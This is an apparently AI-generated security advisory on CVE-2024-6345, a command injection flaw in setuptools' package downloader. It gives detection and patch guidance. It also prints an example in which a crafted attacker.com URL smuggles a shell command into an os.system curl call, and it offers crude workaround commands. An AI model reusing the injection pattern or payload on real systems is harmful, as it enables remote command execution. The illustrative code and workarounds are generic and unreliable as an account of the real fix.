CVE-2024-6345 Overview
A vulnerability in the package_index module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.
Critical Impact
This vulnerability allows remote code execution, potentially leading to full system compromise.
Affected Products
- pypa/setuptools versions up to 69.1.1
Discovery Timeline
- 2024-07-15 - CVE CVE-2024-6345 published to NVD
- 2025-11-04 - Last updated in NVD database
Technical Details for CVE-2024-6345
Vulnerability Analysis
The vulnerability arises from insecure handling of URLs in the package_index module. The module does not properly sanitize its inputs, so a malicious actor can inject arbitrary code through a manipulated package URL. Code execution occurs because the download functions perform insufficient checks on what gets executed during the download process.
Root Cause
Lack of input validation and sanitization when processing URLs leads to code injection.
Attack Vector
This vulnerability can be exploited over a network, where an attacker provides a specially crafted package URL, which then leads to code execution on the vulnerable system.
# Example exploitation code (sanitized)
import os

def download_package(url):
    # The URL is interpolated directly into a shell command string,
    # so any shell metacharacters it contains are interpreted by the shell.
    os.system(f"curl {url} -o package.zip")

# Malicious URL: everything after the ';' is run as a separate shell command
malicious_url = "http://attacker.com/malicious?;evil_command"
download_package(malicious_url)
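To show the defensive counterpart of the pattern above, here is an added example (not setuptools' own code and not the project's actual fix) that places the injectable string-building beside a hardened form: the URL is checked against an HTTP(S) scheme allowlist and then passed to the downloader as a single argv element, so no shell ever parses it. The curl flags and the `package.zip` default are assumptions chosen for illustration.

```python
import subprocess
from typing import List
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def vulnerable_command(url: str) -> str:
    """The injectable pattern from the advisory: the URL is spliced into a
    shell command string. Only built here for comparison, never executed."""
    return f"curl {url} -o package.zip"


def url_is_acceptable(url: str) -> bool:
    """Allowlist check: only well-formed http(s) URLs with a host are accepted."""
    parsed = urlparse(url)
    return parsed.scheme in ALLOWED_SCHEMES and bool(parsed.netloc)


def hardened_download_argv(url: str, dest: str = "package.zip") -> List[str]:
    """Hardened form: validate the URL, then return an argument vector in which
    the URL is exactly one element. Shell metacharacters such as ';' stay
    inside that element because no shell tokenises the command."""
    if not url_is_acceptable(url):
        raise ValueError(f"refusing non-HTTP(S) or malformed URL: {url!r}")
    return ["curl", "--fail", "--location", url, "-o", dest]


def download(url: str, dest: str = "package.zip") -> int:
    """Run the hardened command without a shell (shell=False is the default
    for subprocess.run when given a list) and return curl's exit status."""
    return subprocess.run(hardened_download_argv(url, dest), check=False).returncode


if __name__ == "__main__":
    # Constructed sample input reusing the advisory's placeholder URL.
    crafted = "http://attacker.com/malicious?;evil_command"
    print("shell string :", vulnerable_command(crafted))   # ';evil_command' is live here
    print("argv list    :", hardened_download_argv(crafted))  # ';evil_command' is inert here
```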
Detection Methods for CVE-2024-6345
Indicators of Compromise
- Unexpected network requests to untrusted sources
- Unusual process executions in conjunction with package installations
- Anomalies in package download paths
Detection Strategies
Utilize Endpoint Detection and Response (EDR) systems to monitor for suspicious behaviors such as curl being used to download executables or scripts. SentinelOne products can leverage behavioral AI to detect such anomalies.
Monitoring Recommendations
- Monitor network traffic for unexpected destinations.
- Audit system calls related to downloading and executing files.
- Maintain logs of executed commands during package installations.
How to Mitigate CVE-2024-6345
Immediate Actions Required
- Update to setuptools version 70.0 or later.
- Restrict execution permissions for non-trusted users.
- Implement strict input sanitization on all user-provided data.
Patch Information
Upgrade setuptools to version 70.0, where the vulnerability is patched. This removes the deprecated code paths susceptible to injection.
Workarounds
Isolate vulnerable systems from sensitive environments and apply network restrictions to minimize exposure.
# Configuration example
# Resolve the placeholder attacker hostname to localhost so downloads to it never leave the machine
echo "127.0.0.1 attacker.com" >> /etc/hosts
# Remove the execute bit from curl so the injected download command cannot be launched
chmod -x /usr/local/bin/curl
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

